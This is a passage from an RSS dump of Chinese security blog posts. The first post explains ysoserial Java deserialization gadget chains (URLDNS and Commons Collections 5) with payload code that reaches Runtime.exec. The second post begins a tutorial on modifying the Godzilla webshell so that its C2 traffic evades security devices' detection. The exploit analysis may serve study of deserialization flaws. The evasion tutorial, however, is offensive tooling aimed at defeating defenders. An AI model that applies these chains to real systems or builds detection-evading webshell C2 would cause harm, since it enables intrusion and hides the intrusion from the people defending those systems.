src="https://wechat2rss.xlab.app/img-proxy/?k=7838e004&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9Vxnwiakia2aiaYMveBiasf6Iiajof20d3GCzz9JMXAbARibTg3RnUrsFrUMqaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>这时我们跟进到key的hashcode方法中，他存在判断，当hashcode不等于-1时直接返回hashcode，等于-1时调用handler的hashcode进行处理。所以我们还需要跟进。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000489" data-ratio="0.47534357316087306" data-w="1237" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=d4307fc9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9Vxj5LnMkgfqzaibn5CWcy7wxj2WX4lrHz3YZ20y8GueAyeMUTBqicvlEsw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>跟到这一步，为何会触发dnslog就已经清晰了，在最终handler的hashcode中执行了gethostaddress操作，仔细看他直接收一个参数u。</p><p>ok那到这里暂时逻辑清楚了，我们需要制作一个payload满足key不为空，并且hashcode必须是-1，这样就能最终进入到handler的hashcode中执行了gethostaddress。那回过头来看yso的payload</p><p><img class="rich_pages wxw-img" data-imgfileid="100000486" data-ratio="0.4370044052863436" data-w="1135" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e0e0ba4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxD8G4RImXFtlvB7SLjDicYVltribauyF9VJ0tL5rmZGPuAe4ODGKaaO5w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>逐行解释</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="sql"><code><span class="code-snippet_outer">URLStreamHandler <span class="code-snippet__keyword">handler</span> = <span class="code-snippet__keyword">new</span> SilentURLStreamHandler();用于处理url的打开，链接，读取等行为</span></code></pre></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="cs"><code><span class="code-snippet_outer">HashMap ht = <span class="code-snippet__keyword">new</span> HashMap();</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">URL u = <span class="code-snippet__keyword">new</span> URL((URL)<span class="code-snippet__literal">null</span>, url, handler);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">创建一个url对象u，并传入<span class="code-snippet__keyword">string</span>类型的url作为我们的dnslog地址</span></code></pre></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">ht</span><span class="code-snippet__selector-class">.put</span>(<span class="code-snippet__selector-tag">u</span>, <span class="code-snippet__selector-tag">url</span>);</span></code><code><span class="code-snippet_outer">发送请求</span></code></pre></section><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">Reflections.setFieldValue(u, <span class="code-snippet__string">&#34;hashCode&#34;</span>, <span class="code-snippet__number">-1</span>);</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">精髓就在这一句，通过反射修改u对象的hashcode参数为<span class="code-snippet__number">-1</span></span></code></pre></section><p>整理下思路入口点hashmap的readobject，其中在putval时调用hash方法处理了key。在hash方法中key不为空情况下调用了key的hashcode，key的hashcode要求必须为-1才可进行到执行dnslog的逻辑。</p><p>所以看ht.put(u, url);这一句，其中u就是key相当于我们传入的dnslog地址，url就是value。url这个可以随意更改，在逻辑中我们也看到了这条链触发和value没有任何关系。</p><p>在获得key之后我们达成了key不为空条件，此时通过反射调用hashcode方法，并且修改为-1达成必须为-1的条件，这样完美触发dnslog请求。</p><p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-imgfileid="100000499" data-ratio="0.5015625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=17a9f5d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxDibp9HBdS3kaEeWLlATEs4tCHrVxj0SM65JUbBz8PdtLhZXFZ2uC6ww%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h5 data-node-type="block" data-block-type="text"><p><span style="font-weight: bold;"><br/></span></p><p><span style="font-size: 24px;"><strong><span style="font-size: 24px;font-weight: bold;">cc5</span></strong></span></p></h5><p>cc链作为经典之一必需拿出来溜溜，再说cc之前需要先知道一些基础知识。</p><p>cc中的存在了一个叫TransformMap的类，这个类实现了一系列的转化，在转化过程中值我们可以自行操作，所以为反序列化漏洞提供了无限的可能。</p><p>那么知道了基础知识后，我们来看下cc5的payload</p><p><img class="rich_pages wxw-img" data-imgfileid="100000488" data-ratio="0.41383755908895575" height="169px" data-type="png" data-w="2327" src="https://wechat2rss.xlab.app/img-proxy/?k=f5604b4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9Vxutibr1fdUNUeKskMj5l6Ppk6wXYfyve7Wfl9at6QMrxlntZRvkc4LPw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>以命令执行为例子，反序列化漏洞需要我们生成一个可以命令执行的payload，那么在java中我们知道最常见的命令执行代码就是runtime.exec了。那么就来看一眼yso的payload是怎么构造出命令执行的呢？</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">Transformer[] transformers = <span class="code-snippet__keyword">new</span> Transformer[]{<span class="code-snippet__keyword">new</span> ConstantTransformer(Runtime.class), <span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;getMethod&#34;</span>, <span class="code-snippet__keyword">new</span> Class[]{<span class="code-snippet__built_in">String</span>.class, Class[].class}, <span class="code-snippet__keyword">new</span> <span class="code-snippet__built_in">Object</span>[]{<span class="code-snippet__string">&#34;getRuntime&#34;</span>, <span class="code-snippet__keyword">new</span> Class[<span class="code-snippet__number">0</span>]}), <span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;invoke&#34;</span>, <span class="code-snippet__keyword">new</span> Class[]{<span class="code-snippet__built_in">Object</span>.class, <span class="code-snippet__built_in">Object</span>[].class}, <span class="code-snippet__keyword">new</span> <span class="code-snippet__built_in">Object</span>[]{<span class="code-snippet__literal">null</span>, <span class="code-snippet__keyword">new</span> <span class="code-snippet__built_in">Object</span>[<span class="code-snippet__number">0</span>]}), <span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;exec&#34;</span>, <span class="code-snippet__keyword">new</span> Class[]{<span class="code-snippet__built_in">String</span>.class}, execArgs), <span class="code-snippet__keyword">new</span> ConstantTransformer(<span class="code-snippet__number">1</span>)};</span></code></pre></section><p>这一行是yso的构造出的命令执行，看不懂没关系，我们拆开一点点看。</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">new</span> Transformer[]{<span class="code-snippet__keyword">new</span> ConstantTransformer(Runtime.class)</span></code></pre></section><p>这一句作用是把对象转换为一个恒定的值，在这里的作用就是无论原始映射中的值是什么，TransformMa 都会将其转换为 Runtime.class。这么做的好处就是增加了容错率和反序列化的成功率。</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="php"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;getMethod&#34;</span>, <span class="code-snippet__keyword">new</span> <span class="code-snippet__class"><span class="code-snippet__keyword">Class</span>[]</span>{String.class, <span class="code-snippet__class"><span class="code-snippet__keyword">Class</span>[].<span class="code-snippet__title">class</span>}, <span class="code-snippet__title">new</span> <span class="code-snippet__title">Object</span>[]</span>{<span class="code-snippet__string">&#34;getRuntime&#34;</span>, <span class="code-snippet__keyword">new</span> <span class="code-snippet__class"><span class="code-snippet__keyword">Class</span>[0]})</span></span></code></pre></section><p>创建一个InvokerTransformer，它将调用Java运行时类的getMethod方法，参数值是getRuntime，表示要调用getMethod的名称</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer"> <span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;invoke&#34;</span>, <span class="code-snippet__keyword">new</span> Class[]{<span class="code-snippet__built_in">Object</span>.class, <span class="code-snippet__built_in">Object</span>[].class}, <span class="code-snippet__keyword">new</span> <span class="code-snippet__built_in">Object</span>[]{<span class="code-snippet__literal">null</span>, <span class="code-snippet__keyword">new</span> <span class="code-snippet__built_in">Object</span>[<span class="code-snippet__number">0</span>]}),</span></code></pre></section><p>继续使用InvokerTransformer这次调用的是invoke，使用invoke把刚刚反射获取的getMethod实例化出来。</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="php"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;exec&#34;</span>, <span class="code-snippet__keyword">new</span> <span class="code-snippet__class"><span class="code-snippet__keyword">Class</span>[]</span>{String.class}, execArgs)</span></code></pre></section><p>在invoke完成的基础上调用exec方法。</p><p>此时回想一下刚刚一系列的操作。先是设置恒定值Runtime.class。然后使用getMethod获取到他的getRuntime，使用invoke实例出来，最后调用实例化后的exec方法，所以这行代码最终结果就是</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="css"><code><span class="code-snippet_outer"><span class="code-snippet__selector-tag">Runtime</span><span class="code-snippet__selector-class">.getRuntime</span>()<span class="code-snippet__selector-class">.exec</span></span></code></pre></section><p><br/></p><p>做个实验</p><p><img class="rich_pages wxw-img" data-imgfileid="100000490" data-ratio="0.1388221153846154" height="57px" data-type="png" data-w="1664" src="https://wechat2rss.xlab.app/img-proxy/?k=92e86485&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxBHiakN1xiaZfwZnwwqiaac8rgnmcw6dKd7rRqPlgpGqwDqROfdO26k5kg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>看这段简易的代码，和yso的payload很类似。</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">Runtime test = Runtime.getRuntime();</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">InvokerTransformer invokerTransformer = <span class="code-snippet__keyword">new</span> InvokerTransformer(<span class="code-snippet__string">&#34;exec&#34;</span>,<span class="code-snippet__keyword">new</span> Class[]{<span class="code-snippet__built_in">String</span>.class},<span class="code-snippet__keyword">new</span> <span class="code-snippet__built_in">Object</span>[]{<span class="code-snippet__string">&#34;calc&#34;</span>});</span></code><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer">invokerTransformer.transform(test);</span></code></pre></section><p><br/></p><p>功能很简单，test赋值Runtime.getRuntime()方便下面的操作成功获取。</p><p>使用InvokerTransformer传递了exec这个方法，并且它可以接受两个参数，把calc作为参数传递进去。</p><p>最后调用InvokerTransformer的transform方法，将先前创建的Runtime对象作为第一个参数传递。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000494" data-ratio="0.5435148792813026" height="223px" data-type="png" data-w="1781" src="https://wechat2rss.xlab.app/img-proxy/?k=0b585f56&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxXucIdjl0KfVprzpWYLYNUnVicf7vul5WaLUrpSeaYzIkVo4X4fOJ4GQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>执行结果就是成功弹出计算器。</p><p>总结一下其实InvokerTransformer其实就是把上一个处理的结果作为输入，并且用户可以对其进行自定义的操作，在我们的操作里就使用了反射获取了一个可被我们操控的命令执行语句。</p><p>那么现在payload有了我们继续看cc5的链子。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000491" data-ratio="0.25388127853881276" height="104px" data-type="png" data-w="1095" src="https://wechat2rss.xlab.app/img-proxy/?k=be9359f2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxdYCEsoY4usepT7tt9ujcB81sZTvLJRgRKLFt6sriawubDYPIhJbPeVw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer"><span class="code-snippet__built_in">Map</span> lazyMap = LazyMap.decorate(innerMap, transformerChain);</span></code></pre></section><p>进入LazyMap</p><p><img class="rich_pages wxw-img" data-imgfileid="100000492" data-ratio="0.502116850127011" height="206px" data-type="png" data-w="1181" src="https://wechat2rss.xlab.app/img-proxy/?k=178ead9c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9Vx3uzPLHzVKlwS1fwImqdWQVFicHQrSIib1ibGTQpmLE3lRe10yC5tgoN5A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>发现其继承自Serializable可被序列化。并且存在了一个高危险的操作transform。去找谁调用了get方法。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000493" data-ratio="0.49636627906976744" height="203px" data-type="png" data-w="1376" src="https://wechat2rss.xlab.app/img-proxy/?k=5a83fd55&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9Vx0oh67YekicWY6ZDp6DiaFXTFAFL9AMkZrhhstAia6RgHOIWVQzKyRwmOg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>根据链可知TiedMapEntry中调用了get这个方法。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000495" data-ratio="0.46101903007980355" height="189px" data-type="png" data-w="1629" src="https://wechat2rss.xlab.app/img-proxy/?k=8f3cc974&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxohJepibBicDia2yZORLE7VVuBEouf0GMCia8Xw9BFfj8mQ1IicASlOc1W0Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>那么现在逐渐清晰了，我们通过调用getval相当于间接调用了get这个方法，所以现在就是找哪里调用过getval</p><p><img class="rich_pages wxw-img" data-imgfileid="100000497" data-ratio="0.3902316213494461" height="160px" data-type="png" data-w="1986" src="https://wechat2rss.xlab.app/img-proxy/?k=beba7438&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxKA87R0VhYfoYxWrPA7NcwGq5gibbZmeCiaQTKqoRWhN9IzIG33a3pEsA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>搜索可知equals，hashcode，toString都利用了getval方法。</p><p>那么还记得反序列化的必要条件吗，必须是有readobject，所以我们现在就来找哪里的readobject使用了这三个方法。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000498" data-ratio="0.4599899345747358" height="189px" data-type="png" data-w="1987" src="https://wechat2rss.xlab.app/img-proxy/?k=3dde184a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxrCZFMwgBHqHQtc3pfSyz9H7huEossW2c9AicMsUjqT9GibDpHZcQY8vg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>根据链子我们找到了BadAttributeValueExpException，发现其使用了readobject，并且使用了tostring方法。至此cc5的链就完美的形成了。</p><p>总结一下，BadAttributeValueExpException.readObject调用了tostring方法，相当于简介调用了TiedMapEntry.getValue，然而TiedMapEntry.getValue中调用了LazyMap.get方法。这个方法中存在了transform这个高危方法可使我们通过反射的方式构造一条命令执行语句出来。</p><p>在调试中可以发现TiedMapEntry中并非只有tostring调用了getval</p><p><img class="rich_pages wxw-img" data-imgfileid="100000496" data-ratio="0.4585427135678392" height="188px" data-type="png" data-w="1592" src="https://wechat2rss.xlab.app/img-proxy/?k=2779180c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxribSDEqT9KBBxian9iaxXXRkoJh3gqSOho30glSLOaZzzicJKV2fJoWiakQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>所以其实这三个位置都有可发展空间，比如hashcode，是不是很眼熟？？？就留给大家自己发散思维吧。</p><p><br/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484150">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=3021a8cc&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484150%26idx%3D1%26sn%3Dddd749b70e11fb06c56354f1068c403a%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 08 Mar 2024 16:39:00 +0800</pubDate>
    </item>
    <item>
      <title>手把手带二开哥斯拉（1）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484126&amp;idx=1&amp;sn=5c0c13cae91a89ed5ed9cc075f44f134</link>
      <description>由于哥斯拉流传过于广泛，以至于实际业务中很多设备会对其进行查杀，主要手段一是查杀webshell，二是针对流量</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group</span> <span>2024-02-28 15:50</span> <span style="display: inline-block;">安徽</span>
</p>

<p>由于哥斯拉流传过于广泛，以至于实际业务中很多设备会对其进行查杀，主要手段一是查杀webshell，二是针对流量</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6492e693&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnPUVy1Q17WNEEfHRYh07I9tjmhichFMTpAeVaCrIZ3ePUwpek4EupxAA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span>由于哥斯拉流传过于广泛，以至于实际业务中很多设备会对其进行查杀，主要手段一是查杀webshell，二是针对流量特征进行分析。</span></p><p><span>这篇先大致讲下如何对自己shell的流量进行保护。</span></p><p><span>先看下原版哥斯拉的流量特征有什么</span></p><p><span>大致了解下过程，在点击链接时候会发送三个包，第一个强特征发送自定义的函数列表给服务端（后期内部命令执行，文件查看等功能都是在此时把接口传入服务端的），返回值获得session</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000461" data-ratio="0.3450920245398773" data-s="300,640" style="" data-type="png" data-w="1956" src="https://wechat2rss.xlab.app/img-proxy/?k=a6a45992&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7Zn4NLNybgLader8X1ic2ut4fAibBDFIZ7XXnFicRDBW6uCFs857s1NFadOg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>第二个验活。没什么特殊</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000462" data-ratio="0.173355629877369" data-s="300,640" style="" data-type="png" data-w="1794" src="https://wechat2rss.xlab.app/img-proxy/?k=3c1d93ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnbYBNgMwJUBuxLO2NXUFlwvGAOhSp4vqI1r6owibsLSSfSyxhM26lqqw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>第三个返回对方服务器的配置等信息，就是每次连接时的基础信息那部分</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000464" data-ratio="0.3971386285150469" data-s="300,640" style="" data-type="png" data-w="2027" src="https://wechat2rss.xlab.app/img-proxy/?k=a7d01b3c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnvdY4oLXNfWJ987I35EMz4rKHGlxr5th6Oic4rDcP6oDAKhhmUM0ZPbw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>上面数据包包括返回结果，从算法与长度上都非常容易被检测，稍加探测即可发现是恶意攻击流量。</span></p><p><span>为了规避这些检查，需要对请求与返回包进行自定义，对webshell动态加载。<br/></span></p><p><strong><span style="font-size: 24px;">自定义profile</span></strong></p><p><span>增加profile管理功能， 最基础的增删改查。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000465" data-ratio="0.4283876500857633" data-s="300,640" style="" data-type="png" data-w="2332" src="https://wechat2rss.xlab.app/img-proxy/?k=07599529&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7Zn5ZXicumic2fOnz6EG3m3bnPE8PZ1iaMws60icqj4ahLrBP9BanxUYo1SAQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>具体如何实现ui可通过swing进行编写，就不过多阐述</span></p><p style="margin-bottom: 0px;"><strong><span style="font-size: 24px;">shellsetting</span></strong><span style="font-size: 24px;"><br/></span></p><p><span>在添加完ui后需进入shellsetting添加Profile下拉框等组件，方便使用</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000467" data-ratio="0.7348484848484849" data-w="660" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=c37ae4b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnGc2WzFPpUhWglOb9V3iauibgVKJr2mxFnOSgPpwj6TjVO8mO0ibh3Cr4g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li><li></li></ul><pre class="code-snippet__js" data-lang="typescript"><code><span class="code-snippet_outer"><br/></span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">private</span> JComboBox&lt;<span class="code-snippet__built_in">String</span>&gt; c2ProfileComboBox;</span></code><code><span class="code-snippet_outer"><br/></span></code></pre></section><p><span>绑定布局<br/></span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000468" data-ratio="0.4224299065420561" data-w="1070" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7c026ff2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnPf3FULjNTvQe9rkLd4tnwSPgrhNJ8m3BxaT7oVQrQE8poHoyRTD8WQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">GBC gbcLC2Profile = (<span class="code-snippet__keyword">new</span> GBC(<span class="code-snippet__number">0</span>, <span class="code-snippet__number">13</span>)).setInsets(<span class="code-snippet__number">5</span>, <span class="code-snippet__number">-40</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>);</span></code><code><span class="code-snippet_outer">GBC gbcC2Profile = (<span class="code-snippet__keyword">new</span> GBC(<span class="code-snippet__number">1</span>, <span class="code-snippet__number">13</span>, <span class="code-snippet__number">3</span>, <span class="code-snippet__number">1</span>)).setInsets(<span class="code-snippet__number">5</span>, <span class="code-snippet__number">20</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>);</span></code></pre></section><p><span>添加控件</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000469" data-ratio="0.5522842639593909" data-w="985" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=43f7d708&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7Zn7kc1LLVRqfOQJajkicVItqiajArSY2LR5sr3fE8icD8JOuFh8Q44wgd6w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li><li></li></ul><pre class="code-snippet__js" data-lang="kotlin"><code><span class="code-snippet_outer"><span class="code-snippet__keyword">this</span>.basicsPanel.add(<span class="code-snippet__keyword">this</span>.c2ProfileLabel, gbcLC2Profile);</span></code><code><span class="code-snippet_outer"><span class="code-snippet__keyword">this</span>.basicsPanel.add(<span class="code-snippet__keyword">this</span>.c2ProfileComboBox, gbcC2Profile);</span></code></pre></section><p><span>添加事件</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000471" data-ratio="0.32406287787182586" data-w="1654" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=be3fdcfb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnzHkPPf3hl2HJuT88aAJsMV3sGElAcHhdf94dNXJtXFv4Gp0YSicpibLQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>这些做完之后就能收获一个完整的profile功能</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000470" data-ratio="1.0641200545702592" data-w="733" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=dc030aeb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnVwcpPibsSC4ggG3l1tzI6Xxj5vwWSCkcLG5C1nERAicVcIf9wx7HTM7Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>但是仅仅这样是不够的，现在我们只能创建profile，怎么把他应用到数据包中呢？</span></p><h1 data-node-type="block" data-block-type="text"><p><strong><span style="font-size: 24px;">shellentity</span></strong></p></h1><p><span>为了使我们创建的profile能应用进数据包中，我们需要修改哥斯拉存储shell实体的部分代码</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000472" data-ratio="0.6857142857142857" data-w="700" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e042446f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7Znb9Aicmhe4jtCiazjs713hmeYcTehGhxx7v5nKsKfRcP54pFXlibsNXU3w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>添加新字段并编写对应代码以存储profile信息</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000473" data-ratio="0.35207612456747406" data-w="1156" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=69069f0e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnUsaicChdG7fEw4YOPliaDyViaoiaMkbQyIJohXDbNoM3B51w9RyUwbPxyg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>信息存储了还远远不够需要有地方能够处理。</span></p><h1 data-node-type="block" data-block-type="text"><p><strong><span style="font-size: 24px;">c2channel</span></strong></p></h1><p><span>c2channel算是哥斯拉中的核心，负责处理载荷与发送c2请求，所以最核心的地方我们需要在发送数据包前处理有关profile的代码</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000474" data-ratio="0.6857923497267759" data-w="1464" data-type="png" 